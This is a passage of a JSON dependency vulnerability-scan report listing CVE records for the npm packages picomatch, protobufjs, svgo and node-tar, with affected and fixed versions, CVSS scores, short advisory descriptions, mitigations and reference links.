untrusted glob patterns to picomatch. Possible mitigations include sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`; avoiding the use of POSIX bracket expressions if user input is involved; and manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype.", "Severity": "MEDIUM", "CweIDs": [ "CWE-1321" ], "VendorSeverity": { "azure": 2, "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33672", "https://github.com/micromatch/picomatch", "https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903", "https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p", "https://nvd.nist.gov/vuln/detail/CVE-2026-33672", "https://www.cve.org/CVERecord?id=CVE-2026-33672" ], "PublishedDate": "2026-03-26T22:16:30.387Z", "LastModifiedDate": "2026-04-01T13:44:53.397Z" }, { "VulnerabilityID": "CVE-2026-33671", "VendorIDs": [ "GHSA-c2c7-rcm5-vvqj" ], "PkgID": "picomatch@4.0.3", "PkgName": "picomatch", "PkgIdentifier": { "PURL": "pkg:npm/picomatch@4.0.3", "UID": "166fd27b204f47e7" }, "InstalledVersion": "4.0.3", "FixedVersion": "4.0.4, 3.0.2, 2.3.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33671", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:171d15564273b964007bf3b1a42ee9409167366a82525b96d5db0efd08692e83", "Title": "picomatch: Picomatch: Regular Expression Denial of Service via crafted extglob patterns", "Description": "Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input. Applications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`. Possible mitigations include disabling extglob support for untrusted patterns by using `noextglob: true`, rejecting or sanitizing patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`, enforcing strict allowlists for accepted pattern syntax, running matching in an isolated worker or separate process with time and resource limits, and applying application-level request throttling and input validation for any endpoint that accepts glob patterns.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "azure": 3, "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33671", "https://github.com/micromatch/picomatch", "https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d", "https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj", "https://nvd.nist.gov/vuln/detail/CVE-2026-33671", "https://www.cve.org/CVERecord?id=CVE-2026-33671" ], "PublishedDate": "2026-03-26T22:16:30.21Z", "LastModifiedDate": "2026-04-01T13:45:11.687Z" }, { "VulnerabilityID": "CVE-2026-33672", "VendorIDs": [ "GHSA-3v7f-55p6-f55p" ], "PkgID": "picomatch@4.0.3", "PkgName": "picomatch", "PkgIdentifier": { "PURL": "pkg:npm/picomatch@4.0.3", "UID": "166fd27b204f47e7" }, "InstalledVersion": "4.0.3", "FixedVersion": "4.0.4, 3.0.2, 2.3.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33672", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:81d3a35a529917ad52d2f0b8db30785862be58c5ee8ef96bae234c6febbf6036", "Title": "picomatch: Picomatch: Data integrity compromised via method injection with crafted POSIX bracket expressions", "Description": "Picomatch is a glob matcher written JavaScript. Versions prior to 4.0.4, 3.0.2, and 2.3.2 are vulnerable to a method injection vulnerability affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression. This leads to incorrect glob matching behavior (integrity impact), where patterns may match unintended filenames. The issue does not enable remote code execution, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control. All users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted. This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2. Users should upgrade to one of these versions or later, depending on their supported release line. If upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch. Possible mitigations include sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`; avoiding the use of POSIX bracket expressions if user input is involved; and manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype.", "Severity": "MEDIUM", "CweIDs": [ "CWE-1321" ], "VendorSeverity": { "azure": 2, "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33672", "https://github.com/micromatch/picomatch", "https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903", "https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p", "https://nvd.nist.gov/vuln/detail/CVE-2026-33672", "https://www.cve.org/CVERecord?id=CVE-2026-33672" ], "PublishedDate": "2026-03-26T22:16:30.387Z", "LastModifiedDate": "2026-04-01T13:44:53.397Z" }, { "VulnerabilityID": "CVE-2026-41242", "VendorIDs": [ "GHSA-xq3m-2v4x-88gg" ], "PkgID": "protobufjs@7.5.4", "PkgName": "protobufjs", "PkgIdentifier": { "PURL": "pkg:npm/protobufjs@7.5.4", "UID": "4bd1bebf607e950b" }, "InstalledVersion": "7.5.4", "FixedVersion": "8.0.1, 7.5.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41242", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:851f5c0d7cc9d736e8dd6b32798265b722b936176dfe7e20fbd47c04d6a2d501", "Title": "Arbitrary code execution in protobufjs", "Description": "protobufjs compiles protobuf definitions into JavaScript (JS) functions. In versions prior to 8.0.1 and 7.5.5, attackers can inject arbitrary code in the \"type\" fields of protobuf definitions, which will then execute during object decoding using that definition. Versions 8.0.1 and 7.5.5 patch the issue.", "Severity": "CRITICAL", "CweIDs": [ "CWE-94" ], "VendorSeverity": { "ghsa": 4, "nvd": 4 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H", "V40Score": 9.4 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "V3Score": 9.8 } }, "References": [ "https://github.com/protobufjs/protobuf.js", "https://github.com/protobufjs/protobuf.js/commit/535df444ac060243722ac5d672db205e5c531d75", "https://github.com/protobufjs/protobuf.js/commit/ff7b2afef8754837cc6dc64c864cd111ab477956", "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.5.5", "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v8.0.1", "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-xq3m-2v4x-88gg" ], "PublishedDate": "2026-04-18T17:16:13.983Z", "LastModifiedDate": "2026-04-23T15:26:37.2Z" }, { "VulnerabilityID": "CVE-2026-29074", "VendorIDs": [ "GHSA-xpqw-6gx7-v673" ], "PkgID": "svgo@3.3.2", "PkgName": "svgo", "PkgIdentifier": { "PURL": "pkg:npm/svgo@3.3.2", "UID": "80489c325cac7574" }, "InstalledVersion": "3.3.2", "FixedVersion": "2.8.1, 3.3.3, 4.0.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29074", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:af9b6588f4dc323d3f13f88b802a2be635ebed12a9f1ebc4c18a0543258cbdf8", "Title": "svgo: SVGO: Denial of Service via XML entity expansion", "Description": "SVGO, short for SVG Optimizer, is a Node.js library and command-line application for optimizing SVG files. From version 2.1.0 to before version 2.8.1, from version 3.0.0 to before version 3.3.3, and before version 4.0.1, SVGO accepts XML with custom entities, without guards against entity expansion or recursion. This can result in a small XML file (811 bytes) stalling the application and even crashing the Node.js process with JavaScript heap out of memory. This issue has been patched in versions 2.8.1, 3.3.3, and 4.0.1.", "Severity": "HIGH", "CweIDs": [ "CWE-776" ], "VendorSeverity": { "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-29074", "https://github.com/svg/svgo", "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673", "https://nvd.nist.gov/vuln/detail/CVE-2026-29074", "https://www.cve.org/CVERecord?id=CVE-2026-29074" ], "PublishedDate": "2026-03-06T08:16:26.92Z", "LastModifiedDate": "2026-03-10T19:02:54.257Z" }, { "VulnerabilityID": "CVE-2026-23745", "VendorIDs": [ "GHSA-8qq5-rm4j-mr97" ], "PkgID": "tar@6.2.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@6.2.1", "UID": "c4ef5ba6cdfac8c6" }, "InstalledVersion": "6.2.1", "FixedVersion": "7.5.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23745", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:d4056383847ee274d4435e7f8c68ab8dafbaa1457ce552d618a30db24a1f488c", "Title": "node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives", "Description": "node-tar is a Tar for Node.js. The node-tar library (\u003c= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.", "Severity": "HIGH", "CweIDs": [ "CWE-22" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "nvd": 2, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N", "V40Score": 8.2 }, "nvd": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "V3Score": 6.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "V3Score": 8.2 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-23745", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e", "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97", "https://nvd.nist.gov/vuln/detail/CVE-2026-23745", "https://www.cve.org/CVERecord?id=CVE-2026-23745" ], "PublishedDate": "2026-01-16T22:16:26.83Z", "LastModifiedDate": "2026-02-18T16:20:07.823Z" }, { "VulnerabilityID": "CVE-2026-23950", "VendorIDs": [ "GHSA-r6q2-hw4h-h46w" ], "PkgID": "tar@6.2.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@6.2.1", "UID": "c4ef5ba6cdfac8c6" }, "InstalledVersion": "6.2.1", "FixedVersion": "7.5.4", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23950", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:d98d0a62d700c048ae4fa2d17bcab00e03b3ba0cb69b19f9e5f07e11794f0b4d", "Title": "node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition", "Description": "node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.", "Severity": "HIGH", "CweIDs": [ "CWE-176", "CWE-352", "CWE-367" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "nvd": 2, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", "V3Score": 8.8 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "V3Score": 5.9 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", "V3Score": 8.8 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-23950", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6", "https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w", "https://nvd.nist.gov/vuln/detail/CVE-2026-23950", "https://www.cve.org/CVERecord?id=CVE-2026-23950" ], "PublishedDate": "2026-01-20T01:15:57.87Z", "LastModifiedDate": "2026-02-18T15:50:29.91Z" }, { "VulnerabilityID": "CVE-2026-24842", "VendorIDs": [ "GHSA-34x7-hfp2-rc4v" ], "PkgID": "tar@6.2.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@6.2.1", "UID": "c4ef5ba6cdfac8c6" }, "InstalledVersion": "6.2.1", "FixedVersion": "7.5.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-24842", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:a553635fa1558e6fdd3167f54f6491ae4600444f8f872f653fe2ec1cfe47f12d", "Title": "node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check", "Description": "node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.", "Severity": "HIGH", "CweIDs": [ "CWE-22", "CWE-59" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "V3Score": 8.2 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "V3Score": 8.2 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-24842", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46", "https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v", "https://nvd.nist.gov/vuln/detail/CVE-2026-24842", "https://www.cve.org/CVERecord?id=CVE-2026-24842" ], "PublishedDate": "2026-01-28T01:16:14.947Z", "LastModifiedDate": "2026-02-02T14:30:10.89Z" }, { "VulnerabilityID": "CVE-2026-26960", "VendorIDs": [ "GHSA-83g3-92jg-28cx" ], "PkgID": "tar@6.2.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@6.2.1", "UID": "c4ef5ba6cdfac8c6" }, "InstalledVersion": "6.2.1", "FixedVersion": "7.5.8", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26960", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:069a277ef4cd3fd3765af27e3d5650fdf98c94cf19431c076990049c4b42f158", "Title": "node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation", "Description": "node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8.", "Severity": "HIGH", "CweIDs": [ "CWE-22" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "V3Score": 7.1 }, "nvd": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "V3Score": 7.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "V3Score": 7.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-26960", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384", "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f", "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx", "https://nvd.nist.gov/vuln/detail/CVE-2026-26960", "https://www.cve.org/CVERecord?id=CVE-2026-26960" ], "PublishedDate": "2026-02-20T02:16:53.883Z", "LastModifiedDate": "2026-02-20T19:24:16.537Z" }, { "VulnerabilityID": "CVE-2026-29786", "VendorIDs": [ "GHSA-qffp-2rhf-9h96" ], "PkgID": "tar@6.2.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@6.2.1", "UID": "c4ef5ba6cdfac8c6" }, "InstalledVersion": "6.2.1", "FixedVersion": "7.5.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29786", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:eedb592c4f0dc46dfbb54278634b1a02f3c170cc115b8591842869e7a187d674", "Title": "node-tar: hardlink path traversal via drive-relative linkpath", "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.", "Severity": "HIGH", "CweIDs": [ "CWE-22", "CWE-59" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "nvd": 2, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L", "V40Score": 8.2 }, "nvd": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N", "V3Score": 6.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N", "V3Score": 8.6 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-29786", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f", "https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96", "https://nvd.nist.gov/vuln/detail/CVE-2026-29786", "https://www.cve.org/CVERecord?id=CVE-2026-29786" ], "PublishedDate": "2026-03-07T16:15:55.587Z", "LastModifiedDate": "2026-03-11T21:50:01.91Z" }, { "VulnerabilityID": "CVE-2026-31802", "VendorIDs": [ "GHSA-9ppj-qmqm-q256" ], "PkgID": "tar@6.2.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@6.2.1", "UID": "c4ef5ba6cdfac8c6" }, "InstalledVersion": "6.2.1", "FixedVersion": "7.5.11", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-31802", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:a4a001e046dd48c018590362fcd2ff950ac2f0565d456beb71515996ffeee7f1", "Title": "tar: tar: File overwrite via drive-relative symlink traversal", "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.", "Severity": "HIGH", "CweIDs": [ "CWE-22" ], "VendorSeverity": { "ghsa": 3, "nvd": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N", "V40Score": 8.2 }, "nvd": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "V3Score": 5.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "V3Score": 6.2 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-31802", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad", "https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256", "https://nvd.nist.gov/vuln/detail/CVE-2026-31802", "https://www.cve.org/CVERecord?id=CVE-2026-31802" ], "PublishedDate": "2026-03-10T07:44:58.02Z", "LastModifiedDate": "2026-03-18T18:13:34.703Z" }, { "VulnerabilityID": "CVE-2026-23745", "VendorIDs": [ "GHSA-8qq5-rm4j-mr97" ], "PkgID": "tar@7.5.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@7.5.1", "UID": "4114cf1deb64beb5" }, "InstalledVersion": "7.5.1", "FixedVersion": "7.5.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23745", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:d422f6c2ae140b1980249012dabfd9c7b619a0648684a2a57d532db11e02f6df", "Title": "node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives", "Description": "node-tar is a Tar for Node.js. The node-tar library (\u003c= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.", "Severity": "HIGH", "CweIDs": [ "CWE-22" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "nvd": 2, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N", "V40Score": 8.2 }, "nvd": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "V3Score": 6.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "V3Score": 8.2 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-23745", "https://github.com/isaacs/node-tar", "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e", "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97", "https://nvd.nist.gov/vuln/detail/CVE-2026-23745", "https://www.cve.org/CVERecord?id=CVE-2026-23745" ], "PublishedDate": "2026-01-16T22:16:26.83Z", "LastModifiedDate": "2026-02-18T16:20:07.823Z" }, { "VulnerabilityID": "CVE-2026-23950", "VendorIDs": [ "GHSA-r6q2-hw4h-h46w" ], "PkgID": "tar@7.5.1", "PkgName": "tar", "PkgIdentifier": { "PURL": "pkg:npm/tar@7.5.1", "UID": "4114cf1deb64beb5" }, "InstalledVersion": "7.5.1", "FixedVersion": "7.5.4", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23950", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:f66f7d4f8f59c34e1743a65eae2ba93a294687723229e1b4bbfd56e9b1ae23c2", "Title": "node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition", "Description": "node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.", "Severity": "HIGH", "CweIDs": [ "CWE-176", "CWE-352", "CWE-367" ], "VendorSeverity": { "amazon": 3, "ghsa": 3, "nvd": 2, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", "V3Score": 8.8 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "V3Score": 5.9 }, "redhat": { "V3Vector": 